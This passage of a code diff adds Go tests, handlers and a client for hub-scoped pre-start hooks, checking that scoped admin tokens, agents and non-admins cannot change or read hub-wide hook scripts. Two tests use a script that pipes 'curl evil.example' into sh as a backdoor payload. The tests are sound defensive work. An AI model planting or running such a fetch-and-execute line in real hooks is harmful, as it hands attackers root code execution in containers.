+		req.Header.Set("Content-Type", "application/json")
+	}
+	req.Header.Set("Authorization", "Bearer "+token)
+
+	rec := httptest.NewRecorder()
+	srv.Handler().ServeHTTP(rec, req)
+	return rec
 }
 
 // createHubHook creates a hub-scoped hook via the API as the admin dev user.
@@ -389,6 +440,178 @@ func TestHubPreStartHooks_Delete_NonAdminForbidden(t *testing.T) {
 // =============================================================================
 // Routing edge cases
 // =============================================================================
+
+// =============================================================================
+// Scoped User Access Tokens must never mutate hub-wide policy
+//
+// A UAT embeds the minting user's role, so an admin-minted project-scoped CI
+// token would pass a plain role check. Hub hooks execute as root in every
+// agent container, so mutations require an unscoped hub admin.
+// =============================================================================
+
+func TestHubPreStartHooks_Create_ScopedAdminForbidden(t *testing.T) {
+	srv, s := testServer(t)
+	admin := createAdminUserForHubPSH(t, s)
+	token := uatTokenForUser(t, srv, s, admin)
+
+	body := CreateProjectPreStartHookRequest{Name: "Backdoor", Script: "#!/bin/sh\ncurl evil.example | sh\n"}
+	rec := doRequestWithToken(t, srv, token, http.MethodPost, hubPSHPath, body)
+	assert.Equal(t, http.StatusForbidden, rec.Code, "body: %s", rec.Body.String())
+}
+
+func TestHubPreStartHooks_Update_ScopedAdminForbidden(t *testing.T) {
+	srv, s := testServer(t)
+	admin := createAdminUserForHubPSH(t, s)
+	token := uatTokenForUser(t, srv, s, admin)
+
+	created := createHubHook(t, srv, "Original", "original", "#!/bin/sh\necho original\n")
+
+	hijacked := "#!/bin/sh\ncurl evil.example | sh\n"
+	rec := doRequestWithToken(t, srv, token, http.MethodPut, hubPSHPath+"/"+created.ID,
+		UpdateProjectPreStartHookRequest{Script: &hijacked})
+	assert.Equal(t, http.StatusForbidden, rec.Code, "body: %s", rec.Body.String())
+}
+
+func TestHubPreStartHooks_Activate_ScopedAdminForbidden(t *testing.T) {
+	srv, s := testServer(t)
+	admin := createAdminUserForHubPSH(t, s)
+	token := uatTokenForUser(t, srv, s, admin)
+
+	first := createHubHook(t, srv, "First", "first", "#!/bin/sh\n")
+	createHubHook(t, srv, "Second", "second", "#!/bin/sh\n")
+
+	rec := doRequestWithToken(t, srv, token, http.MethodPost, hubPSHPath+"/"+first.ID+"/activate", nil)
+	assert.Equal(t, http.StatusForbidden, rec.Code, "body: %s", rec.Body.String())
+}
+
+func TestHubPreStartHooks_Delete_ScopedAdminForbidden(t *testing.T) {
+	srv, s := testServer(t)
+	admin := createAdminUserForHubPSH(t, s)
+	token := uatTokenForUser(t, srv, s, admin)
+
+	hook := createHubHook(t, srv, "Hook", "hook", "#!/bin/sh\n")
+
+	rec := doRequestWithToken(t, srv, token, http.MethodDelete, hubPSHPath+"/"+hook.ID, nil)
+	assert.Equal(t, http.StatusForbidden, rec.Code, "body: %s", rec.Body.String())
+}
+
+// =============================================================================
+// GET authorization, query parameters, and script redaction
+// =============================================================================
+
+// Agent JWTs authenticate, but hub hook policy is not an agent's business.
+func TestHubPreStartHooks_List_AgentTokenRejected(t *testing.T) {
+	srv, _ := testServer(t)
+
+	createHubHook(t, srv, "Baseline", "baseline", "#!/bin/sh\necho baseline\n")
+
+	agentToken, err := srv.agentTokenService.GenerateAgentToken(
+		"agent-hub-psh", tid("project-hub-psh"), []AgentTokenScope{ScopeAgentStatusUpdate}, nil,
+	)
+	require.NoError(t, err)
+
+	rec := doRequestWithToken(t, srv, agentToken, http.MethodGet, hubPSHPath, nil)
+	assert.Equal(t, http.StatusUnauthorized, rec.Code, "body: %s", rec.Body.String())
+}
+
+func TestHubPreStartHooks_Get_AgentTokenRejected(t *testing.T) {
+	srv, _ := testServer(t)
+
+	hook := createHubHook(t, srv, "Baseline", "baseline", "#!/bin/sh\necho baseline\n")
+
+	agentToken, err := srv.agentTokenService.GenerateAgentToken(
+		"agent-hub-psh", tid("project-hub-psh"), []AgentTokenScope{ScopeAgentStatusUpdate}, nil,
+	)
+	require.NoError(t, err)
+
+	rec := doRequestWithToken(t, srv, agentToken, http.MethodGet, hubPSHPath+"/"+hook.ID, nil)
+	assert.Equal(t, http.StatusUnauthorized, rec.Code, "body: %s", rec.Body.String())
+}
+
+// ?status=active returns only the active hook, even though archived hooks exist.
+func TestHubPreStartHooks_List_StatusActiveFilter(t *testing.T) {
+	srv, _ := testServer(t)
+
+	createHubHook(t, srv, "First", "first", "#!/bin/sh\necho first\n")
+	second := createHubHook(t, srv, "Second", "second", "#!/bin/sh\necho second\n")
+
+	rec := doRequest(t, srv, http.MethodGet, hubPSHPath+"?status=active&limit=1", nil)
+	require.Equal(t, http.StatusOK, rec.Code, "body: %s", rec.Body.String())
+
+	var resp ListProjectPreStartHooksResponse
+	require.NoError(t, json.NewDecoder(rec.Body).Decode(&resp))
+	require.Len(t, resp.Hooks, 1)
+	assert.Equal(t, second.ID, resp.Hooks[0].ID)
+	assert.Equal(t, store.ProjectPreStartHookStatusActive, resp.Hooks[0].Status)
+}
+
+// ?status=active with no active hub hook is an empty list, not a 404.
+func TestHubPreStartHooks_List_StatusActiveFilter_None(t *testing.T) {
+	srv, _ := testServer(t)
+
+	rec := doRequest(t, srv, http.MethodGet, hubPSHPath+"?status=active&limit=1", nil)
+	require.Equal(t, http.StatusOK, rec.Code, "body: %s", rec.Body.String())
+
+	var resp ListProjectPreStartHooksResponse
+	require.NoError(t, json.NewDecoder(rec.Body).Decode(&resp))
+	assert.Empty(t, resp.Hooks)
+}
+
+func TestHubPreStartHooks_List_LimitCapsResults(t *testing.T) {
+	srv, _ := testServer(t)
+
+	createHubHook(t, srv, "First", "first", "#!/bin/sh\n")
+	createHubHook(t, srv, "Second", "second", "#!/bin/sh\n")
+	createHubHook(t, srv, "Third", "third", "#!/bin/sh\n")
+
+	rec := doRequest(t, srv, http.MethodGet, hubPSHPath+"?limit=2", nil)
+	require.Equal(t, http.StatusOK, rec.Code, "body: %s", rec.Body.String())
+
+	var resp ListProjectPreStartHooksResponse
+	require.NoError(t, json.NewDecoder(rec.Body).Decode(&resp))
+	assert.Len(t, resp.Hooks, 2)
+}
+
+func TestHubPreStartHooks_List_InvalidLimit(t *testing.T) {
+	srv, _ := testServer(t)
+
+	rec := doRequest(t, srv, http.MethodGet, hubPSHPath+"?limit=abc", nil)
+	assert.Equal(t, http.StatusBadRequest, rec.Code, "body: %s", rec.Body.String())
+}
+
+// Hub scripts can contain infrastructure secrets: non-admins get metadata only.
+func TestHubPreStartHooks_List_NonAdminScriptRedacted(t *testing.T) {
+	srv, s := testServer(t)
+	member := createNonAdminUserForHubPSH(t, s)
+
+	created := createHubHook(t, srv, "Baseline", "baseline", "#!/bin/sh\necho SECRET_TOKEN\n")
+
+	rec := doRequestAsUser(t, srv, member, http.MethodGet, hubPSHPath, nil)
+	require.Equal(t, http.StatusOK, rec.Code, "body: %s", rec.Body.String())
+	assert.NotContains(t, rec.Body.String(), "SECRET_TOKEN")
+
+	var resp ListProjectPreStartHooksResponse
+	require.NoError(t, json.NewDecoder(bytes.NewReader(rec.Body.Bytes())).Decode(&resp))
+	require.Len(t, resp.Hooks, 1)
+	assert.Equal(t, created.ID, resp.Hooks[0].ID)
+	assert.Equal(t, "Baseline", resp.Hooks[0].Name)
+	assert.Empty(t, resp.Hooks[0].Script, "script must be stripped for non-admins")
+}
+
+// Admins still see the script body in list responses.
+func TestHubPreStartHooks_List_AdminSeesScript(t *testing.T) {
+	srv, _ := testServer(t)
+
+	createHubHook(t, srv, "Baseline", "baseline", "#!/bin/sh\necho baseline\n")
+
+	rec := doRequest(t, srv, http.MethodGet, hubPSHPath, nil)
+	require.Equal(t, http.StatusOK, rec.Code)
+
+	var resp ListProjectPreStartHooksResponse
+	require.NoError(t, json.NewDecoder(rec.Body).Decode(&resp))
+	require.Len(t, resp.Hooks, 1)
+	assert.Equal(t, "#!/bin/sh\necho baseline\n", resp.Hooks[0].Script)
+}
 
 func TestHubPreStartHooks_MethodNotAllowed(t *testing.T) {
 	srv, _ := testServer(t)

--- a/pkg/hub/hub_pre_start_hook_handlers_test.go
+++ b/pkg/hub/hub_pre_start_hook_handlers_test.go
@@ -1,0 +1,407 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+//go:build !no_sqlite
+
+package hub
+
+import (
+	"encoding/json"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/GoogleCloudPlatform/scion/pkg/store"
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+)
+
+const hubPSHPath = "/api/v1/pre-start-hooks"
+
+// createNonAdminUserForHubPSH creates an authenticated hub member (non-admin)
+// used to assert that mutating hub-hook endpoints are admin-only.
+func createNonAdminUserForHubPSH(t *testing.T, s store.Store) *store.User {
+	t.Helper()
+	user := &store.User{
+		ID:          tid("hub-psh-member-" + t.Name()),
+		Email:       "member-" + strings.ToLower(t.Name()) + "@example.com",
+		DisplayName: "Hub Member",
+		Role:        store.UserRoleMember,
+		Status:      "active",
+	}
+	require.NoError(t, s.CreateUser(t.Context(), user))
+	return user
+}
+
+// createHubHook creates a hub-scoped hook via the API as the admin dev user.
+func createHubHook(t *testing.T, srv *Server, name, slug, script string) store.ProjectPreStartHook {
+	t.Helper()
+	body := CreateProjectPreStartHookRequest{Name: name, Slug: slug, Script: script}
+	rec := doRequest(t, srv, http.MethodPost, hubPSHPath, body)
+	require.Equal(t, http.StatusCreated, rec.Code, "body: %s", rec.Body.String())
+	var hook store.ProjectPreStartHook
+	require.NoError(t, json.NewDecoder(rec.Body).Decode(&hook))
+	return hook
+}
+
+// =============================================================================
+// GET /api/v1/pre-start-hooks — list
+// =============================================================================
+
+func TestHubPreStartHooks_List_Empty(t *testing.T) {
+	srv, _ := testServer(t)
+
+	rec := doRequest(t, srv, http.MethodGet, hubPSHPath, nil)
+	require.Equal(t, http.StatusOK, rec.Code, "body: %s", rec.Body.String())
+
+	var resp ListProjectPreStartHooksResponse
+	require.NoError(t, json.NewDecoder(rec.Body).Decode(&resp))
+	assert.Empty(t, resp.Hooks)
+}
+
+func TestHubPreStartHooks_List(t *testing.T) {
+	srv, _ := testServer(t)
+
+	createHubHook(t, srv, "First", "first", "#!/bin/sh\necho first\n")
+	createHubHook(t, srv, "Second", "second", "#!/bin/sh\necho second\n")
+
+	rec := doRequest(t, srv, http.MethodGet, hubPSHPath, nil)
+	require.Equal(t, http.StatusOK, rec.Code, "body: %s", rec.Body.String())
+
+	var resp ListProjectPreStartHooksResponse
+	require.NoError(t, json.NewDecoder(rec.Body).Decode(&resp))
+	require.Len(t, resp.Hooks, 2)
+	for _, h := range resp.Hooks {
+		assert.Equal(t, store.PreStartHookScopeHub, h.Scope)
+		assert.Empty(t, h.ProjectID, "hub hooks carry no project ID")
+	}
+}
+
+// Project-scoped hooks must never leak into the hub list, and vice versa.
+func TestHubPreStartHooks_List_ExcludesProjectHooks(t *testing.T) {
+	srv, s := testServer(t)
+	project := createTestProjectForPSH(t, s)
+
+	projectBody := CreateProjectPreStartHookRequest{Name: "Project hook", Script: "#!/bin/sh\necho project\n"}
+	recProj := doRequest(t, srv, http.MethodPost, "/api/v1/projects/"+project.ID+"/pre-start-hooks", projectBody)
+	require.Equal(t, http.StatusCreated, recProj.Code, "body: %s", recProj.Body.String())
+
+	hubHook := createHubHook(t, srv, "Hub hook", "hub-hook", "#!/bin/sh\necho hub\n")
+
+	rec := doRequest(t, srv, http.MethodGet, hubPSHPath, nil)
+	require.Equal(t, http.StatusOK, rec.Code)
+	var resp ListProjectPreStartHooksResponse
+	require.NoError(t, json.NewDecoder(rec.Body).Decode(&resp))
+	require.Len(t, resp.Hooks, 1)
+	assert.Equal(t, hubHook.ID, resp.Hooks[0].ID)
+}
+
+// Non-admin authenticated users may read the hub hook list — the project
+// settings page needs this for the "Inherited from hub" banner.
+func TestHubPreStartHooks_List_NonAdminAllowed(t *testing.T) {
+	srv, s := testServer(t)
+	member := createNonAdminUserForHubPSH(t, s)
+
+	createHubHook(t, srv, "Baseline", "baseline", "#!/bin/sh\necho baseline\n")
+
+	rec := doRequestAsUser(t, srv, member, http.MethodGet, hubPSHPath, nil)
+	require.Equal(t, http.StatusOK, rec.Code, "body: %s", rec.Body.String())
+
+	var resp ListProjectPreStartHooksResponse
+	require.NoError(t, json.NewDecoder(rec.Body).Decode(&resp))
+	require.Len(t, resp.Hooks, 1)
+}
+
+func TestHubPreStartHooks_List_Unauthenticated(t *testing.T) {
+	srv, _ := testServer(t)
+
+	rec := doRequestNoAuth(t, srv, http.MethodGet, hubPSHPath, nil)
+	assert.Equal(t, http.StatusUnauthorized, rec.Code)
+}
+
+// =============================================================================
+// POST /api/v1/pre-start-hooks — create
+// =============================================================================
+
+func TestHubPreStartHooks_Create(t *testing.T) {
+	srv, _ := testServer(t)
+
+	body := CreateProjectPreStartHookRequest{
+		Name:        "Install dev tools",
+		Description: "hub-wide baseline",
+		Script:      "#!/bin/sh\napt-get install -y jq\n",
+	}
+	rec := doRequest(t, srv, http.MethodPost, hubPSHPath, body)
+	require.Equal(t, http.StatusCreated, rec.Code, "body: %s", rec.Body.String())
+
+	var hook store.ProjectPreStartHook
+	require.NoError(t, json.NewDecoder(rec.Body).Decode(&hook))
+	assert.Equal(t, "Install dev tools", hook.Name)
+	assert.Equal(t, "install-dev-tools", hook.Slug)
+	assert.Equal(t, store.PreStartHookScopeHub, hook.Scope)
+	assert.Equal(t, store.ProjectPreStartHookStatusActive, hook.Status)
+	assert.Empty(t, hook.ProjectID)
+	assert.NotEmpty(t, hook.ID)
+}
+
+func TestHubPreStartHooks_Create_NonAdminForbidden(t *testing.T) {
+	srv, s := testServer(t)
+	member := createNonAdminUserForHubPSH(t, s)
+
+	body := CreateProjectPreStartHookRequest{Name: "Sneaky", Script: "#!/bin/sh\n"}
+	rec := doRequestAsUser(t, srv, member, http.MethodPost, hubPSHPath, body)
+	assert.Equal(t, http.StatusForbidden, rec.Code, "body: %s", rec.Body.String())
+}
+
+func TestHubPreStartHooks_Create_MissingName(t *testing.T) {
+	srv, _ := testServer(t)
+
+	rec := doRequest(t, srv, http.MethodPost, hubPSHPath, CreateProjectPreStartHookRequest{Script: "#!/bin/sh\n"})
+	assert.Equal(t, http.StatusBadRequest, rec.Code)
+}
+
+func TestHubPreStartHooks_Create_MissingScript(t *testing.T) {
+	srv, _ := testServer(t)
+
+	rec := doRequest(t, srv, http.MethodPost, hubPSHPath, CreateProjectPreStartHookRequest{Name: "My hook"})
+	assert.Equal(t, http.StatusBadRequest, rec.Code)
+}
+
+func TestHubPreStartHooks_Create_ScriptTooLarge(t *testing.T) {
+	srv, _ := testServer(t)
+
+	// 65 KB script — over the 64 KB limit.
+	body := CreateProjectPreStartHookRequest{Name: "Big hook", Script: strings.Repeat("x", 65*1024)}
+	rec := doRequest(t, srv, http.MethodPost, hubPSHPath, body)
+	assert.Equal(t, http.StatusBadRequest, rec.Code)
+}
+
+func TestHubPreStartHooks_Create_ArchivesPreviousActive(t *testing.T) {
+	srv, _ := testServer(t)
+
+	first := createHubHook(t, srv, "First hook", "first-hook", "#!/bin/sh\necho first\n")
+	createHubHook(t, srv, "Second hook", "second-hook", "#!/bin/sh\necho second\n")
+
+	rec := doRequest(t, srv, http.MethodGet, hubPSHPath+"/"+first.ID, nil)
+	require.Equal(t, http.StatusOK, rec.Code)
+	var reloaded store.ProjectPreStartHook
+	require.NoError(t, json.NewDecoder(rec.Body).Decode(&reloaded))
+	assert.Equal(t, store.ProjectPreStartHookStatusArchived, reloaded.Status)
+}
+
+// =============================================================================
+// GET /api/v1/pre-start-hooks/{id} — detail
+// =============================================================================
+
+func TestHubPreStartHooks_Get(t *testing.T) {
+	srv, _ := testServer(t)
+
+	created := createHubHook(t, srv, "My hook", "my-hook", "#!/bin/sh\necho hello\n")
+
+	rec := doRequest(t, srv, http.MethodGet, hubPSHPath+"/"+created.ID, nil)
+	require.Equal(t, http.StatusOK, rec.Code, "body: %s", rec.Body.String())
+	var got store.ProjectPreStartHook
+	require.NoError(t, json.NewDecoder(rec.Body).Decode(&got))
+	assert.Equal(t, created.ID, got.ID)
+	assert.Equal(t, "#!/bin/sh\necho hello\n", got.Script)
+	assert.Equal(t, store.PreStartHookScopeHub, got.Scope)
+}
+
+func TestHubPreStartHooks_Get_NonAdminAllowed(t *testing.T) {
+	srv, s := testServer(t)
+	member := createNonAdminUserForHubPSH(t, s)
+
+	created := createHubHook(t, srv, "Baseline", "baseline", "#!/bin/sh\necho baseline\n")
+
+	rec := doRequestAsUser(t, srv, member, http.MethodGet, hubPSHPath+"/"+created.ID, nil)
+	require.Equal(t, http.StatusOK, rec.Code, "body: %s", rec.Body.String())
+}
+
+func TestHubPreStartHooks_Get_NotFound(t *testing.T) {
+	srv, _ := testServer(t)
+
+	rec := doRequest(t, srv, http.MethodGet, hubPSHPath+"/00000000-0000-0000-0000-000000000001", nil)
+	assert.Equal(t, http.StatusNotFound, rec.Code)
+}
+
+// A project-scoped hook ID must not be readable through the hub route.
+func TestHubPreStartHooks_Get_ProjectHookNotFound(t *testing.T) {
+	srv, s := testServer(t)
+	project := createTestProjectForPSH(t, s)
+
+	body := CreateProjectPreStartHookRequest{Name: "Project hook", Script: "#!/bin/sh\n"}
+	recProj := doRequest(t, srv, http.MethodPost, "/api/v1/projects/"+project.ID+"/pre-start-hooks", body)
+	require.Equal(t, http.StatusCreated, recProj.Code)
+	var projectHook store.ProjectPreStartHook
+	require.NoError(t, json.NewDecoder(recProj.Body).Decode(&projectHook))
+
+	rec := doRequest(t, srv, http.MethodGet, hubPSHPath+"/"+projectHook.ID, nil)
+	assert.Equal(t, http.StatusNotFound, rec.Code)
+}
+
+// =============================================================================
+// PUT /api/v1/pre-start-hooks/{id} — update
+// =============================================================================
+
+func TestHubPreStartHooks_Update(t *testing.T) {
+	srv, _ := testServer(t)
+
+	created := createHubHook(t, srv, "Original", "original", "#!/bin/sh\necho original\n")
+
+	newName := "Updated name"
+	newScript := "#!/bin/sh\necho updated\n"
+	rec := doRequest(t, srv, http.MethodPut, hubPSHPath+"/"+created.ID, UpdateProjectPreStartHookRequest{
+		Name:   &newName,
+		Script: &newScript,
+	})
+	require.Equal(t, http.StatusOK, rec.Code, "body: %s", rec.Body.String())
+
+	var updated store.ProjectPreStartHook
+	require.NoError(t, json.NewDecoder(rec.Body).Decode(&updated))
+	assert.Equal(t, "Updated name", updated.Name)
+	assert.Equal(t, newScript, updated.Script)
+	assert.Equal(t, store.PreStartHookScopeHub, updated.Scope)
+}
+
+func TestHubPreStartHooks_Update_NonAdminForbidden(t *testing.T) {
+	srv, s := testServer(t)
+	member := createNonAdminUserForHubPSH(t, s)
+
+	created := createHubHook(t, srv, "Original", "original", "#!/bin/sh\necho original\n")
+
+	newName := "Hijacked"
+	rec := doRequestAsUser(t, srv, member, http.MethodPut, hubPSHPath+"/"+created.ID,
+		UpdateProjectPreStartHookRequest{Name: &newName})
+	assert.Equal(t, http.StatusForbidden, rec.Code)
+}
+
+func TestHubPreStartHooks_Update_ScriptTooLarge(t *testing.T) {
+	srv, _ := testServer(t)
+
+	created := createHubHook(t, srv, "Original", "original", "#!/bin/sh\n")
+
+	big := strings.Repeat("x", 65*1024)
+	rec := doRequest(t, srv, http.MethodPut, hubPSHPath+"/"+created.ID,
+		UpdateProjectPreStartHookRequest{Script: &big})
+	assert.Equal(t, http.StatusBadRequest, rec.Code)
+}
+
+// =============================================================================
+// POST /api/v1/pre-start-hooks/{id}/activate
+// =============================================================================
+
+func TestHubPreStartHooks_Activate(t *testing.T) {
+	srv, _ := testServer(t)
+
+	first := createHubHook(t, srv, "First", "first", "#!/bin/sh\necho first\n")
+	second := createHubHook(t, srv, "Second", "second", "#!/bin/sh\necho second\n")
+
+	// Activating the (now archived) first hook must archive the second.
+	rec := doRequest(t, srv, http.MethodPost, hubPSHPath+"/"+first.ID+"/activate", nil)
+	require.Equal(t, http.StatusOK, rec.Code, "body: %s", rec.Body.String())
+	var activated store.ProjectPreStartHook
+	require.NoError(t, json.NewDecoder(rec.Body).Decode(&activated))
+	assert.Equal(t, first.ID, activated.ID)
+	assert.Equal(t, store.ProjectPreStartHookStatusActive, activated.Status)
+
+	recSecond := doRequest(t, srv, http.MethodGet, hubPSHPath+"/"+second.ID, nil)
+	require.Equal(t, http.StatusOK, recSecond.Code)
+	var reloadedSecond store.ProjectPreStartHook
+	require.NoError(t, json.NewDecoder(recSecond.Body).Decode(&reloadedSecond))
+	assert.Equal(t, store.ProjectPreStartHookStatusArchived, reloadedSecond.Status)
+}
+
+func TestHubPreStartHooks_Activate_NonAdminForbidden(t *testing.T) {
+	srv, s := testServer(t)
+	member := createNonAdminUserForHubPSH(t, s)
+
+	first := createHubHook(t, srv, "First", "first", "#!/bin/sh\n")
+	createHubHook(t, srv, "Second", "second", "#!/bin/sh\n")
+
+	rec := doRequestAsUser(t, srv, member, http.MethodPost, hubPSHPath+"/"+first.ID+"/activate", nil)
+	assert.Equal(t, http.StatusForbidden, rec.Code)
+}
+
+func TestHubPreStartHooks_Activate_NotFound(t *testing.T) {
+	srv, _ := testServer(t)
+
+	rec := doRequest(t, srv, http.MethodPost, hubPSHPath+"/00000000-0000-0000-0000-000000000001/activate", nil)
+	assert.Equal(t, http.StatusNotFound, rec.Code)
+}
+
+// =============================================================================
+// DELETE /api/v1/pre-start-hooks/{id}
+// =============================================================================
+
+func TestHubPreStartHooks_Delete_OnlyActive_Succeeds(t *testing.T) {
+	srv, _ := testServer(t)
+
+	hook := createHubHook(t, srv, "Hook", "hook", "#!/bin/sh\n")
+
+	rec := doRequest(t, srv, http.MethodDelete, hubPSHPath+"/"+hook.ID, nil)
+	assert.Equal(t, http.StatusNoContent, rec.Code, "body: %s", rec.Body.String())
+}
+
+func TestHubPreStartHooks_Delete_Archived(t *testing.T) {
+	srv, _ := testServer(t)
+
+	first := createHubHook(t, srv, "First", "first", "#!/bin/sh\n")
+	createHubHook(t, srv, "Second", "second", "#!/bin/sh\n")
+
+	rec := doRequest(t, srv, http.MethodDelete, hubPSHPath+"/"+first.ID, nil)
+	require.Equal(t, http.StatusNoContent, rec.Code, "body: %s", rec.Body.String())
+
+	recGet := doRequest(t, srv, http.MethodGet, hubPSHPath+"/"+first.ID, nil)
+	assert.Equal(t, http.StatusNotFound, recGet.Code)
+}
+
+func TestHubPreStartHooks_Delete_Active_WithOtherHooks_Rejected(t *testing.T) {
+	srv, _ := testServer(t)
+
+	createHubHook(t, srv, "First", "first", "#!/bin/sh\n")
+	second := createHubHook(t, srv, "Second", "second", "#!/bin/sh\n")
+
+	rec := doRequest(t, srv, http.MethodDelete, hubPSHPath+"/"+second.ID, nil)
+	assert.Equal(t, http.StatusBadRequest, rec.Code)
+}
+
+func TestHubPreStartHooks_Delete_NonAdminForbidden(t *testing.T) {
+	srv, s := testServer(t)
+	member := createNonAdminUserForHubPSH(t, s)
+
+	hook := createHubHook(t, srv, "Hook", "hook", "#!/bin/sh\n")
+
+	rec := doRequestAsUser(t, srv, member, http.MethodDelete, hubPSHPath+"/"+hook.ID, nil)
+	assert.Equal(t, http.StatusForbidden, rec.Code)
+}
+
+// =============================================================================
+// Routing edge cases
+// =============================================================================
+
+func TestHubPreStartHooks_MethodNotAllowed(t *testing.T) {
+	srv, _ := testServer(t)
+
+	rec := doRequest(t, srv, http.MethodPatch, hubPSHPath, nil)
+	assert.Equal(t, http.StatusMethodNotAllowed, rec.Code)
+}
+
+func TestHubPreStartHooks_UnknownSubResource(t *testing.T) {
+	srv, _ := testServer(t)
+
+	hook := createHubHook(t, srv, "Hook", "hook", "#!/bin/sh\n")
+
+	rec := doRequest(t, srv, http.MethodPost, hubPSHPath+"/"+hook.ID+"/bogus", nil)
+	assert.Equal(t, http.StatusNotFound, rec.Code)
+}

--- a/pkg/hub/project_pre_start_hook_handlers.go
+++ b/pkg/hub/project_pre_start_hook_handlers.go
@@ -109,6 +109,7 @@ func (s *Server) handleProjectPreStartHooks(w http.ResponseWriter, r *http.Reque
 			return
 		}
 
+		r.Body = http.MaxBytesReader(w, r.Body, projectPreStartHookScriptMaxBytes+4096)
 		var req CreateProjectPreStartHookRequest
 		if err := readJSON(r, &req); err != nil {
 			BadRequest(w, "Invalid request body: "+err.Error())
@@ -270,6 +271,7 @@ func (s *Server) handleProjectPreStartHookByID(w http.ResponseWriter, r *http.Re
 			return
 		}
 
+		r.Body = http.MaxBytesReader(w, r.Body, projectPreStartHookScriptMaxBytes+4096)
 		var req UpdateProjectPreStartHookRequest
 		if err := readJSON(r, &req); err != nil {
 			BadRequest(w, "Invalid request body: "+err.Error())

--- a/pkg/hub/scheduler_test.go
+++ b/pkg/hub/scheduler_test.go
@@ -400,6 +400,18 @@ func (m *mockScheduledEventStore) PurgeOldScheduledEvents(_ context.Context, _ t
 	return 0, nil
 }
 
+// Pre-start hook lookups. populateAgentConfig resolves the active pre-start
+// hook on every agent create, so these must be stubbed rather than left to the
+// embedded nil store.Store (which would panic). No hooks exist in these tests.
+
+func (m *mockScheduledEventStore) GetActiveProjectPreStartHook(_ context.Context, _ string) (*store.ProjectPreStartHook, error) {
+	return nil, store.ErrNotFound
+}
+
+func (m *mockScheduledEventStore) GetActiveHubPreStartHook(_ context.Context) (*store.ProjectPreStartHook, error) {
+	return nil, store.ErrNotFound
+}
+
 // Agent-related methods for message handler tests
 
 func (m *mockScheduledEventStore) GetAgent(_ context.Context, id string) (*store.Agent, error) {

--- a/pkg/hub/server.go
+++ b/pkg/hub/server.go
@@ -2733,6 +2733,11 @@ func (s *Server) registerRoutes() {
 	s.mux.HandleFunc("/api/v1/harness-configs", s.handleHarnessConfigs)
 	s.mux.HandleFunc("/api/v1/harness-configs/", s.handleHarnessConfigByID)
 
+	// Hub-scoped pre-start hooks. The project-scoped equivalents live under
+	// /api/v1/projects/{projectId}/pre-start-hooks (see handleProjectRoutes).
+	s.mux.HandleFunc("/api/v1/pre-start-hooks", s.handleHubPreStartHooks)
+	s.mux.HandleFunc("/api/v1/pre-start-hooks/", s.handleHubPreStartHookByID)
+
 	s.mux.HandleFunc("/api/v1/users", s.handleUsers)
 	s.mux.HandleFunc("/api/v1/users/", s.handleUserByID)
 

--- a/pkg/hubclient/client.go
+++ b/pkg/hubclient/client.go
@@ -110,6 +110,9 @@ type Client interface {
 	// ProjectPreStartHooks returns a ProjectPreStartHookService scoped to a project.
 	ProjectPreStartHooks(projectID string) ProjectPreStartHookService
 
+	// HubPreStartHooks returns the hub-scoped pre-start hook service.
+	HubPreStartHooks() HubPreStartHookService
+
 	// Health checks API availability.
 	Health(ctx context.Context) (*HealthResponse, error)
 }

--- a/pkg/hubclient/hub_pre_start_hook.go
+++ b/pkg/hubclient/hub_pre_start_hook.go
@@ -1,0 +1,116 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package hubclient
+
+import (
+	"context"
+	"net/url"
+
+	"github.com/GoogleCloudPlatform/scion/pkg/apiclient"
+	"github.com/GoogleCloudPlatform/scion/pkg/store"
+)
+
+// hubPreStartHookBasePath is the hub-scoped (project-less) hook route prefix.
+const hubPreStartHookBasePath = "/api/v1/pre-start-hooks"
+
+// HubPreStartHookService handles hub-scoped pre-start hook operations. The hub
+// hook is the fallback that applies to any project with no active
+// project-scoped hook. Mutating calls require hub admin; reads do not.
+//
+// Request and response payloads are shared with ProjectPreStartHookService —
+// the shapes are identical, only the scope differs.
+type HubPreStartHookService interface {
+	// List returns all hub-scoped pre-start hooks (active and archived).
+	List(ctx context.Context) (*ListProjectPreStartHooksResponse, error)
+
+	// Get returns a single hub-scoped hook by ID.
+	Get(ctx context.Context, hookID string) (*store.ProjectPreStartHook, error)
+
+	// Create creates a new hub-scoped hook (archives any current active hub hook).
+	Create(ctx context.Context, req *CreateProjectPreStartHookRequest) (*store.ProjectPreStartHook, error)
+
+	// Update updates an existing hub-scoped hook's name, description, or script.
+	Update(ctx context.Context, hookID string, req *UpdateProjectPreStartHookRequest) (*store.ProjectPreStartHook, error)
+
+	// Activate marks an archived hub-scoped hook as active (archives the
+	// current active hub hook).
+	Activate(ctx context.Context, hookID string) (*store.ProjectPreStartHook, error)
+
+	// Delete deletes a hub-scoped hook. Deleting the active hook while other
+	// hub hooks exist returns an error.
+	Delete(ctx context.Context, hookID string) error
+}
+
+// hubPreStartHookService is the concrete implementation.
+type hubPreStartHookService struct {
+	c *client
+}
+
+// HubPreStartHooks returns the hub-scoped pre-start hook service.
+func (c *client) HubPreStartHooks() HubPreStartHookService {
+	return &hubPreStartHookService{c: c}
+}
+
+func (s *hubPreStartHookService) basePath() string {
+	return hubPreStartHookBasePath
+}
+
+func (s *hubPreStartHookService) List(ctx context.Context) (*ListProjectPreStartHooksResponse, error) {
+	resp, err := s.c.get(ctx, s.basePath(), nil)
+	if err != nil {
+		return nil, err
+	}
+	return apiclient.DecodeResponse[ListProjectPreStartHooksResponse](resp)
+}
+
+func (s *hubPreStartHookService) Get(ctx context.Context, hookID string) (*store.ProjectPreStartHook, error) {
